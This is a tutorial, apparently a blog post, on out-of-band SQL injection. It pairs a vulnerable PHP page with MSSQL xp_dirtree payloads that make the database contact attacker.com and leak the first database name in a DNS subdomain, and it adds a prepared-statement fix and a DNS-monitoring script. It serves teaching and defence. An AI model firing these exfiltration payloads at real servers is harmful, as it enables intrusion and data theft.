Thilan Dissanayaka Web App Hacking Apr 26

Out of Band SQL Injection

What is Out-of-Band (OOB) SQL Injection?

Normally in SQL Injection, the attacker:

- Sees direct errors, or
- Infers information through page behavior or timing.

But Out-of-Band SQL Injection is different:

OOB SQLi relies on making the vulnerable database initiate a network connection (such as HTTP or DNS) to an attacker-controlled server to leak data.

This is useful when:

- Errors are hidden,
- There are no differences in page behavior,
- There are no timing differences.

Example:

The vulnerable server sends a DNS or HTTP request to attacker.com containing database data.

How Out-of-Band SQL Injection Works

Some databases have functions that allow making external network connections:

| Database             | Functions                                                               |
|----------------------|-------------------------------------------------------------------------|
| MySQL                | LOAD_FILE(), INTO OUTFILE, xp_dirtree() (when MySQL is linked to MSSQL) |
| Microsoft SQL Server | xp_dirtree(), xp_fileexist()                                            |
| Oracle               | UTL_HTTP.REQUEST, UTL_INADDR.GET_HOST_ADDRESS                           |

An attacker can exploit these features to:

- Force a DNS lookup
- Trigger an HTTP request
- Leak data through those requests.

Real-World Example Setup

Imagine a PHP page like:

<?php
// $conn is assumed to be an already-open mysqli connection (it is not shown in this snippet).
$id = $_GET['id'];
// The id is concatenated straight into the query string, so whatever the user sends becomes SQL.
$query = "SELECT name, price FROM products WHERE id = '$id'";
$result = mysqli_query($conn, $query);
if (mysqli_num_rows($result) > 0) {
    $row = mysqli_fetch_assoc($result);
    echo "Product Name: " . $row['name'];
}
?>

Problems:

- User input is directly injected into SQL
- No output-based or time-based feedback
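The hardened form of that page, added here as an example that is not part of the original post: it checks that id is an integer and then binds it as a prepared-statement parameter, so the value is compared against the id column and never parsed as SQL. It assumes $conn is an open mysqli connection, as the original snippet does, and that the driver is mysqlnd (needed for get_result()).

```php
<?php
// Added example: the same product lookup with the id kept out of the SQL text.
// Assumes $conn is an open mysqli connection (not shown here, as in the original).

$id = $_GET['id'] ?? '';

// Reject anything that is not a string of digits before it reaches the database.
// ctype_digit() returns false for an empty string, so a missing id is rejected too.
if (!ctype_digit($id)) {
    http_response_code(400);
    exit('Invalid product id');
}
$id = (int) $id;

// Prepared statement: the placeholder is bound to a typed value, so the database
// receives the query text and the id separately and cannot interpret the id as SQL.
$stmt = $conn->prepare("SELECT name, price FROM products WHERE id = ?");
if ($stmt === false) {
    http_response_code(500);
    exit('Query could not be prepared');
}
$stmt->bind_param('i', $id);
$stmt->execute();
$result = $stmt->get_result();

if ($row = $result->fetch_assoc()) {
    // Escape on output as well, since the name column is rendered into HTML.
    echo "Product Name: " . htmlspecialchars($row['name'], ENT_QUOTES, 'UTF-8');
}
$stmt->close();
?>
```

The integer check is defence in depth rather than the fix: the prepared statement alone stops the injection, but rejecting non-numeric ids early keeps junk requests out of the database and gives you a clean 400 to log and alert on.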

Example OOB SQL Injection Exploit

Assume the database is Microsoft SQL Server and has access to the internet. We can use the function xp_dirtree() to trigger a network request.

Injection payload:


'; EXEC master..xp_dirtree '\\attacker.com\test' --

Full URL:

http://victim.com/product.php?id='; EXEC master..xp_dirtree '\\attacker.com\test'--

What happens?

- The database server tries to list the contents of the share \\attacker.com\test
- A DNS lookup happens for attacker.com
- The attacker sees the request and knows the SQL injection worked!

Another Example: Leaking Data

You can even exfiltrate data!

Example payload:

'; EXEC master..xp_dirtree '\\' + (SELECT TOP 1 name FROM master..sysdatabases) + '.attacker.com\abc' --

If the first database name is 'testdb', the database server will try to access:

testdb.attacker.com

If you monitor your domain’s DNS logs, you can see the database name!

Setting Up the Attacker's Server

You need to set up:

- A DNS listener (for example, using tcpdump, dnsmasq, Burp Collaborator, or Interactsh)
- Or a web server to catch HTTP requests.

A simple way to catch DNS queries with tcpdump:

sudo tcpdump -i eth0 port 53

Or use public services like:

- Interactsh (by Project Discovery)
- Burp Collaborator client

They give you a domain like random.oastify.com and log incoming requests.
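From the defender's side, the same kind of DNS capture shows whether the database server is resolving names it has no business resolving. The following PHP script is an added example, not part of the original post: it parses lines in the shape of tcpdump's DNS query output, keeps only queries sent by the database server's address, drops names under an allowlist of expected domains, and reports what remains together with the leftmost label, which is where an xp_dirtree payload puts the leaked value. The addresses, domain names and log lines are constructed for the example, and DB_SERVER_IP and ALLOWED_SUFFIXES are hypothetical settings you would fill in for your own environment.

```php
<?php
// Added example: flag outbound DNS queries from the database server that go anywhere
// other than expected domains. Input lines follow the shape of `tcpdump -i eth0 port 53`
// output; every address, name and line below is constructed, not captured traffic.
// Requires PHP 8 (str_ends_with).

// Hypothetical address of the SQL Server host and the domains it legitimately resolves.
const DB_SERVER_IP = '10.0.0.5';
const ALLOWED_SUFFIXES = ['corp.example', 'windowsupdate.com'];

// Constructed sample of tcpdump DNS output (queries and one response).
const SAMPLE_LOG = <<<LOG
12:00:01.000001 IP 10.0.0.5.49152 > 10.0.0.53.53: 1001+ A? sqlnode01.corp.example. (40)
12:00:02.000002 IP 10.0.0.21.50001 > 10.0.0.53.53: 1002+ A? www.example.org. (33)
12:00:03.000003 IP 10.0.0.5.49153 > 10.0.0.53.53: 1003+ A? attacker.com. (30)
12:00:04.000004 IP 10.0.0.5.49154 > 10.0.0.53.53: 1004+ A? testdb.attacker.com. (37)
12:00:04.100005 IP 10.0.0.53.53 > 10.0.0.5.49154: 1004 NXDomain 0/1/0 (112)
LOG;

/** Parse one tcpdump line into [source IP, queried name], or null if it is not a query. */
function parseDnsQuery(string $line): ?array
{
    // Matches "IP <src>.<port> > <resolver>.53: <id>+ <TYPE>? <name>." and ignores responses.
    $pattern = '/ IP (\d+\.\d+\.\d+\.\d+)\.\d+ > [\d.]+\.53: \d+\+? [A-Z]+\? ([^\s]+)\. /';
    if (!preg_match($pattern, $line, $m)) {
        return null;
    }
    return [$m[1], strtolower($m[2])];
}

/** True when the name is one of the allowed domains or a subdomain of one. */
function isAllowed(string $qname, array $suffixes): bool
{
    foreach ($suffixes as $suffix) {
        if ($qname === $suffix || str_ends_with($qname, '.' . $suffix)) {
            return true;
        }
    }
    return false;
}

/**
 * Return one alert per query the database server sent to a non-allowlisted name.
 * 'label' is the leftmost label when the name has more than two, i.e. the part a
 * payload such as '<dbname>.attacker.com' fills with leaked data.
 */
function findSuspiciousQueries(string $log, string $dbIp, array $suffixes): array
{
    $alerts = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $q = parseDnsQuery($line);
        if ($q === null || $q[0] !== $dbIp || isAllowed($q[1], $suffixes)) {
            continue;
        }
        $labels = explode('.', $q[1]);
        $alerts[] = [
            'qname' => $q[1],
            'label' => count($labels) > 2 ? $labels[0] : '',
        ];
    }
    return $alerts;
}

foreach (findSuspiciousQueries(SAMPLE_LOG, DB_SERVER_IP, ALLOWED_SUFFIXES) as $a) {
    $suffix = $a['label'] !== '' ? " (leaked label: {$a['label']})" : '';
    echo "ALERT: DB server queried {$a['qname']}{$suffix}\n";
}
```

Run against the constructed sample, the script reports only the two queries from 10.0.0.5 to attacker.com, naming testdb as the leaked label on the second. A database server normally resolves a handful of internal names, so the allowlist stays short, and the same capture point will also show the SMB connection attempt that follows the lookup, which is why egress filtering on the database host complements this kind of monitoring.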

